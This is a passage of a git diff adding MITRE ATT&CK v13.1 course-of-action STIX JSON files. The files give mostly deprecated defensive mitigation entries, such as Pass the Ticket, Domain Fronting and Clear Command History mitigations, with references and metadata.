"Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + }, + { + "source_name": "TechNet Applocker vs SRP", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. Retrieved April 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx" + } + ], + "modified": "2021-08-23T20:25:19.380Z", + "name": "Email Collection Mitigation", + "description": "Use of encryption provides an added layer of security to sensitive information sent over email. Encryption using public key cryptography requires the adversary to obtain the private certificate along with an encryption key to decrypt messages.\n\nUse of two-factor authentication for public-facing webmail servers is also a recommended best practice to minimize the usefulness of user names and passwords to adversaries.\n\nIdentify unnecessary system utilities or potentially malicious software that may be used to collect email data files or access the corporate email server, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--388606d3-f38f-45bf-885d-a9dc9df3c8a8.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--388606d3-f38f-45bf-885d-a9dc9df3c8a8.json new file mode 100644 index 0000000000000000000000000000000000000000..37c3ac435251a623d984dac4a291d12b6f50036b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--388606d3-f38f-45bf-885d-a9dc9df3c8a8.json @@ -0,0 +1,32 @@ +{ + "type": "bundle", + "id": "bundle--dbca7ee8-f8e8-4ad4-953b-46d3b68dfc42", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--388606d3-f38f-45bf-885d-a9dc9df3c8a8", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1089", + "external_id": "T1089" + } + ], + "modified": "2019-07-24T19:10:48.260Z", + "name": "Disabling Security Tools Mitigation", + "description": "Ensure proper process, registry, and file permissions are in place to prevent adversaries from disabling or interfering with security services.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--39706d54-0d06-4a25-816a-78cc43455100.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--39706d54-0d06-4a25-816a-78cc43455100.json new file mode 100644 index 0000000000000000000000000000000000000000..bc50e36467b2a19cb722ef9eaf39a8d1696bbe62 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--39706d54-0d06-4a25-816a-78cc43455100.json @@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--5b2e722b-9a99-40ef-bc6d-c24a1042ffc4", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--39706d54-0d06-4a25-816a-78cc43455100", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1025", + "url": "https://attack.mitre.org/mitigations/T1025", + "source_name": "mitre-attack" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + }, + { + "source_name": "TechNet Applocker vs SRP", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. Retrieved April 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx" + } + ], + "modified": "2020-01-17T16:45:23.688Z", + "name": "Data from Removable Media Mitigation", + "description": "Identify unnecessary system utilities or potentially malicious software that may be used to collect data from removable media, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--399d9038-b100-43ef-b28d-a5065106b935.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--399d9038-b100-43ef-b28d-a5065106b935.json new file mode 100644 index 0000000000000000000000000000000000000000..0d27306e74693af1a51c3ac23142a5e348b1fe6d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--399d9038-b100-43ef-b28d-a5065106b935.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--880b373d-bf44-4b6b-be91-62897282def5", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--399d9038-b100-43ef-b28d-a5065106b935", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1095", + "external_id": "T1095" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "modified": "2019-07-25T12:01:33.997Z", + "name": "Standard Non-Application Layer Protocol Mitigation", + "description": "Properly configure firewalls and proxies to limit outgoing traffic to only necessary ports and through proper network gateway systems. Also ensure hosts are only provisioned to communicate over authorized interfaces.\n\nNetwork intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--3a41b366-cfd6-4af2-a6e7-3c6e3c4ebcef.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--3a41b366-cfd6-4af2-a6e7-3c6e3c4ebcef.json new file mode 100644 index 0000000000000000000000000000000000000000..bf7f58f0081f4bbc362d07f70f1f768b2b408fa9 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--3a41b366-cfd6-4af2-a6e7-3c6e3c4ebcef.json @@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--b014ce1a-f43c-4f86-9fc0-9d0591657136", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--3a41b366-cfd6-4af2-a6e7-3c6e3c4ebcef", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1196", + "url": "https://attack.mitre.org/mitigations/T1196", + "source_name": "mitre-attack" + }, + { + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "source_name": "Beechey 2010" + }, + { + "url": "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Microsoft UAC", + "description": "Microsoft. (n.d.). User Account Control. Retrieved January 18, 2018.", + "url": "https://msdn.microsoft.com/library/windows/desktop/dn742497.aspx" + } + ], + "modified": "2020-01-17T16:45:23.678Z", + "name": "Control Panel Items Mitigation", + "description": "This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of operating system design features. For example, mitigating specific Windows API calls and/or execution of particular file extensions will likely have unintended side effects, such as preventing legitimate software (i.e., drivers and configuration tools) from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identification of subsequent malicious behavior.\n\nRestrict storage and execution of Control Panel items to protected directories, such as C:\\Windows, rather than user directories.\n\nIndex known safe Control Panel items and block potentially malicious software using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown executable files.\n\nConsider fully enabling User Account Control (UAC) to impede system-wide changes from illegitimate administrators. (Citation: Microsoft UAC)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--3a476d83-43eb-4fad-9b75-b1febd834e3d.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--3a476d83-43eb-4fad-9b75-b1febd834e3d.json new file mode 100644 index 0000000000000000000000000000000000000000..8ae8e086356044824390f94e8cd159f975ddd173 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--3a476d83-43eb-4fad-9b75-b1febd834e3d.json @@ -0,0 +1,67 @@ +{ + "type": "bundle", + "id": "bundle--fcd76a72-d952-4642-ab48-f4c080d6e0b8", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--3a476d83-43eb-4fad-9b75-b1febd834e3d", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1097", + "url": "https://attack.mitre.org/mitigations/T1097", + "source_name": "mitre-attack" + }, + { + "url": "https://adsecurity.org/?p=556", + "description": "Metcalf, S. (2014, November 22). Mimikatz and Active Directory Kerberos Attacks. Retrieved June 2, 2016.", + "source_name": "ADSecurity AD Kerberos Attacks" + }, + { + "url": "https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf", + "description": "Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016, April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.", + "source_name": "CERT-EU Golden Ticket Protection" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + }, + { + "source_name": "TechNet Applocker vs SRP", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. Retrieved April 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx" + } + ], + "modified": "2021-08-23T20:25:21.478Z", + "name": "Pass the Ticket Mitigation", + "description": "Monitor domains for unusual credential logons. Limit credential overlap across systems to prevent the damage of credential compromise. Ensure that local administrator accounts have complex, unique passwords. Do not allow a user to be a local administrator for multiple systems. Limit domain admin account permissions to domain controllers and limited servers. Delegate other admin functions to separate accounts. (Citation: ADSecurity AD Kerberos Attacks)\n\nFor containing the impact of a previously generated golden ticket, reset the built-in KRBTGT account password twice, which will invalidate any existing golden tickets that have been created with the KRBTGT hash and other Kerberos tickets derived from it. (Citation: CERT-EU Golden Ticket Protection)\n\nAttempt to identify and block unknown or malicious software that could be used to obtain Kerberos tickets and use them to authenticate by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--3e7018e9-7389-48e7-9208-0bdbcbba9483.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--3e7018e9-7389-48e7-9208-0bdbcbba9483.json new file mode 100644 index 0000000000000000000000000000000000000000..9dbea764f75cdd3ddaf1ff3a5f7d1aad324cceb6 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--3e7018e9-7389-48e7-9208-0bdbcbba9483.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--729cbd12-1e2f-4e92-9c42-f8e48b6038b1", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--3e7018e9-7389-48e7-9208-0bdbcbba9483", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1146", + "external_id": "T1146" + }, + { + "url": "http://www.akyl.net/securing-bashhistory-file-make-sure-your-linux-system-users-won%E2%80%99t-hide-or-delete-their-bashhistory", + "description": "Mathew Branwell. (2012, March 21). Securing .bash_history file. Retrieved July 8, 2017.", + "source_name": "Securing bash history" + } + ], + "modified": "2019-07-24T18:05:00.492Z", + "name": "Clear Command History Mitigation", + "description": "Preventing users from deleting or writing to certain files can stop adversaries from maliciously altering their ~/.bash_history files. Additionally, making these environment variables readonly can make sure that the history is preserved (Citation: Securing bash history).", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--3e9f8875-d2f7-4380-a578-84393bd3b025.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--3e9f8875-d2f7-4380-a578-84393bd3b025.json new file mode 100644 index 0000000000000000000000000000000000000000..36357ff7682688ada051c23ccc4447a40f626220 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--3e9f8875-d2f7-4380-a578-84393bd3b025.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--cefa01b5-494f-4ba2-95b7-c32c3dbc0ece", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--3e9f8875-d2f7-4380-a578-84393bd3b025", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1028", + "url": "https://attack.mitre.org/mitigations/T1028", + "source_name": "mitre-attack" + }, + { + "source_name": "NSA Spotting", + "description": "National Security Agency/Central Security Service Information Assurance Directorate. (2015, August 7). Spotting the Adversary with Windows Event Log Monitoring. Retrieved September 6, 2018.", + "url": "https://apps.nsa.gov/iaarchive/library/reports/spotting-the-adversary-with-windows-event-log-monitoring.cfm" + } + ], + "modified": "2020-01-17T16:46:19.274Z", + "name": "Windows Remote Management Mitigation", + "description": "Disable the WinRM service. If the service is necessary, lock down critical enclaves with separate WinRM infrastructure, accounts, and permissions. Follow WinRM best practices on configuration of authentication methods and use of host firewalls to restrict WinRM access to allow communication only to/from specific devices. (Citation: NSA Spotting)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--3efe43d1-6f3f-4fcb-ab39-4a730971f70b.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--3efe43d1-6f3f-4fcb-ab39-4a730971f70b.json new file mode 100644 index 0000000000000000000000000000000000000000..b5099881efa2299bcfc46bfbeb4fcc1343f21619 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--3efe43d1-6f3f-4fcb-ab39-4a730971f70b.json @@ -0,0 +1,31 @@ +{ + "type": "bundle", + "id": "bundle--629de3a4-d157-425b-a91d-e815c0092259", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--3efe43d1-6f3f-4fcb-ab39-4a730971f70b", + "type": "course-of-action", + "created": "2019-07-19T14:33:33.543Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "M1053", + "url": "https://attack.mitre.org/mitigations/M1053" + } + ], + "modified": "2020-03-31T13:11:28.201Z", + "name": "Data Backup", + "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--402e92cd-5608-4f4b-9a34-a2c962e4bcd7.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--402e92cd-5608-4f4b-9a34-a2c962e4bcd7.json new file mode 100644 index 0000000000000000000000000000000000000000..c422437f221058305399fca017b0cd4bfc8564fa --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--402e92cd-5608-4f4b-9a34-a2c962e4bcd7.json @@ -0,0 +1,32 @@ +{ + "type": "bundle", + "id": "bundle--3490f272-364b-4835-b3f3-cf78b1b6e048", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--402e92cd-5608-4f4b-9a34-a2c962e4bcd7", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1160", + "external_id": "T1160" + } + ], + "modified": "2019-07-24T19:48:23.825Z", + "name": "Launch Daemon Mitigation", + "description": "Limit privileges of user accounts and remediate Privilege Escalation vectors so only authorized administrators can create new Launch Daemons.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--54e8722d-2faf-4b1b-93b6-6cbf9551669f.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--54e8722d-2faf-4b1b-93b6-6cbf9551669f.json new file mode 100644 index 0000000000000000000000000000000000000000..4ce68e66e0a106ce9feee39c8b02e380457c3e30 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--54e8722d-2faf-4b1b-93b6-6cbf9551669f.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--96656416-b6db-45b4-82af-a39b87bbe55b", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--54e8722d-2faf-4b1b-93b6-6cbf9551669f", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1200", + "external_id": "T1200" + }, + { + "url": "https://en.wikipedia.org/wiki/IEEE_802.1X", + "description": "Wikipedia. (2018, March 30). IEEE 802.1X. Retrieved April 11, 2018.", + "source_name": "Wikipedia 802.1x" + } + ], + "modified": "2019-07-24T19:35:08.161Z", + "name": "Hardware Additions Mitigation", + "description": "Establish network access control policies, such as using device certificates and the 802.1x standard. (Citation: Wikipedia 802.1x) Restrict use of DHCP to registered devices to prevent unregistered devices from communicating with trusted systems. \n\nBlock unknown devices and accessories by endpoint security configuration and monitoring agent.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--62ae52c9-7197-4f5b-be1d-10d2e1df2c96.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--62ae52c9-7197-4f5b-be1d-10d2e1df2c96.json new file mode 100644 index 0000000000000000000000000000000000000000..cb9bb1ea3aa5036b4bf386690a29435e4090cb05 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--62ae52c9-7197-4f5b-be1d-10d2e1df2c96.json @@ -0,0 +1,42 @@ +{ + "type": "bundle", + "id": "bundle--2964bd62-8969-4028-9fa2-00354c651fca", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--62ae52c9-7197-4f5b-be1d-10d2e1df2c96", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1172", + "external_id": "T1172" + }, + { + "url": "https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html", + "description": "Matthew Dunwoody. (2017, March 27). APT29 Domain Fronting With TOR. Retrieved November 20, 2017.", + "source_name": "FireEye APT29 Domain Fronting With TOR March 2017" + }, + { + "url": "http://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016", + "description": "Dunwoody, M. and Carr, N.. (2016, September 27). No Easy Breach DerbyCon 2016. Retrieved October 4, 2016.", + "source_name": "Mandiant No Easy Breach" + } + ], + "modified": "2019-07-24T19:12:36.946Z", + "name": "Domain Fronting Mitigation", + "description": "If it is possible to inspect HTTPS traffic, the captures can be analyzed for connections that appear to be Domain Fronting.\n\nIn order to use domain fronting, attackers will likely need to deploy additional tools to compromised systems. (Citation: FireEye APT29 Domain Fronting With TOR March 2017) (Citation: Mandiant No Easy Breach) It may be possible to detect or prevent the installation of these tools with Host-based solutions.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--72dade3e-1cba-4182-b3b3-a77ca52f02a1.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--72dade3e-1cba-4182-b3b3-a77ca52f02a1.json new file mode 100644 index 0000000000000000000000000000000000000000..2749ec005dc50825138c3c36e8dc20d0a88c9beb --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--72dade3e-1cba-4182-b3b3-a77ca52f02a1.json @@ -0,0 +1,31 @@ +{ + "type": "bundle", + "id": "bundle--fe4830cd-28de-417d-8324-e7331fbdee5c", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--72dade3e-1cba-4182-b3b3-a77ca52f02a1", + "type": "course-of-action", + "created": "2019-06-06T21:08:58.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "M1025", + "url": "https://attack.mitre.org/mitigations/M1025" + } + ], + "modified": "2020-05-20T13:13:48.900Z", + "name": "Privileged Process Integrity", + "description": "Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--7aee8ea0-0baa-4232-b379-5d9ce98352cf.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--7aee8ea0-0baa-4232-b379-5d9ce98352cf.json new file mode 100644 index 0000000000000000000000000000000000000000..7a631a57e5e07cfc27b92c7fb524930851fe1a23 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--7aee8ea0-0baa-4232-b379-5d9ce98352cf.json @@ -0,0 +1,32 @@ +{ + "type": "bundle", + "id": "bundle--b360a288-c773-45e1-8405-d9ca684ca6d2", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--7aee8ea0-0baa-4232-b379-5d9ce98352cf", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1179", + "external_id": "T1179" + } + ], + "modified": "2019-07-24T19:37:27.850Z", + "name": "Hooking Mitigation", + "description": "This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of operating system design features. For example, mitigating all hooking will likely have unintended side effects, such as preventing legitimate software (i.e., security products) from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git 